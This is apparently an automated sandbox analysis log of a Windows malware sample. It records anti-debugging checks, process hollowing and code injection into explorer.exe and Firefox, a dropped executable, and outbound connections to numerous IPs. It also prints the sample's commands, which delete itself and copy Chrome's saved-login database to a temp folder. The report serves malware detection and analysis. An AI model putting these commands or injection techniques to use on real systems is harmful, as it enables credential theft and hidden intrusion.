Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]	10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]	10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]	10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]	10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]	10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941D5E mov eax, dword ptr fs:[00000030h]	10_2_1E941D5E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h]	10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h]	10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9D46 mov ecx, dword ptr fs:[00000030h]	10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994D4B mov eax, dword ptr fs:[00000030h]	10_2_1E994D4B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h]	10_2_1E93CD40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h]	10_2_1E93CD40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h]	10_2_1E985D43
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h]	10_2_1E985D43
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h]	10_2_1E8C1D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h]	10_2_1E8C1D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D5D60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D5D60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E966D79 mov esi, dword ptr fs:[00000030h]	10_2_1E966D79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E945D60 mov eax, dword ptr fs:[00000030h]	10_2_1E945D60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E995D65 mov eax, dword ptr fs:[00000030h]	10_2_1E995D65
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h]	10_2_1E8FBD71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h]	10_2_1E8FBD71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBA80 mov eax, dword ptr fs:[00000030h]	10_2_1E8BBA80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E976A80 mov eax, dword ptr fs:[00000030h]	10_2_1E976A80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E967ABE mov eax, dword ptr fs:[00000030h]	10_2_1E967ABE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]	10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]	10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]	10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97DAAF mov eax, dword ptr fs:[00000030h]	10_2_1E97DAAF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h]	10_2_1E8D0ACE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h]	10_2_1E8D0ACE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]	10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]	10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]	10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]	10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]	10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]	10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFAEC mov edi, dword ptr fs:[00000030h]	10_2_1E8BFAEC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C9AE4 mov eax, dword ptr fs:[00000030h]	10_2_1E8C9AE4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]	10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]	10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]	10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994AE8 mov eax, dword ptr fs:[00000030h]	10_2_1E994AE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h]	10_2_1E8FAA0E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h]	10_2_1E8FAA0E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DA31 mov eax, dword ptr fs:[00000030h]	10_2_1E94DA31
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97DA30 mov eax, dword ptr fs:[00000030h]	10_2_1E97DA30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h]	10_2_1E8C1A24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h]	10_2_1E8C1A24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov edx, dword ptr fs:[00000030h]	10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h]	10_2_1E944A57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h]	10_2_1E944A57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h]	10_2_1E8F9A48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h]	10_2_1E8F9A48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h]	10_2_1E8EEA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h]	10_2_1E8EEA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFA44 mov ecx, dword ptr fs:[00000030h]	10_2_1E8BFA44
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DA40 mov eax, dword ptr fs:[00000030h]	10_2_1E94DA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h]	10_2_1E95AA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h]	10_2_1E95AA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]	10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]	10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]	10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]	10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DB90 mov eax, dword ptr fs:[00000030h]	10_2_1E94DB90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941B93 mov eax, dword ptr fs:[00000030h]	10_2_1E941B93
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1B80 mov eax, dword ptr fs:[00000030h]	10_2_1E8D1B80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1B9C mov eax, dword ptr fs:[00000030h]	10_2_1E8F1B9C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]	10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]	10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]	10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]	10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E966BDE mov ebx, dword ptr fs:[00000030h]	10_2_1E966BDE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E966BDE mov eax, dword ptr fs:[00000030h]	10_2_1E966BDE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BEBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov ecx, dword ptr fs:[00000030h]	10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov ecx, dword ptr fs:[00000030h]	10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FBC2 mov eax, dword ptr fs:[00000030h]	10_2_1E93FBC2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]	10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]	10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]	10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]	10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h]	10_2_1E8E8BD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h]	10_2_1E8E8BD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h]	10_2_1E8D1BE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h]	10_2_1E8D1BE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8F5BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8F5BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994BE0 mov eax, dword ptr fs:[00000030h]	10_2_1E994BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov ecx, dword ptr fs:[00000030h]	10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DB1B mov eax, dword ptr fs:[00000030h]	10_2_1E94DB1B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEB1C mov eax, dword ptr fs:[00000030h]	10_2_1E8EEB1C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCB1E mov eax, dword ptr fs:[00000030h]	10_2_1E8BCB1E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h]	10_2_1E901B0F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h]	10_2_1E901B0F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCB20 mov eax, dword ptr fs:[00000030h]	10_2_1E8FCB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]	10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]	10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]	10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DB2A mov eax, dword ptr fs:[00000030h]	10_2_1E94DB2A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94FB45 mov eax, dword ptr fs:[00000030h]	10_2_1E94FB45

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk,

10_2_1E902EB0

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 2_2_02322AD2 RtlAddVectoredExceptionHandler,

2_2_02322AD2

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: c8ahotgz8h.exe.14.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 88.99.22.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.120.157.187 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 116.62.216.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.164.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.76.223 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.140.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.2.194.128 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.155.212.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 136.143.191.204 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D50000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Thread register set: target process: 4644			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 4644			Jump to behavior

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"	Jump to behavior

Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000E.00000000.47858819329.0000000004840000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
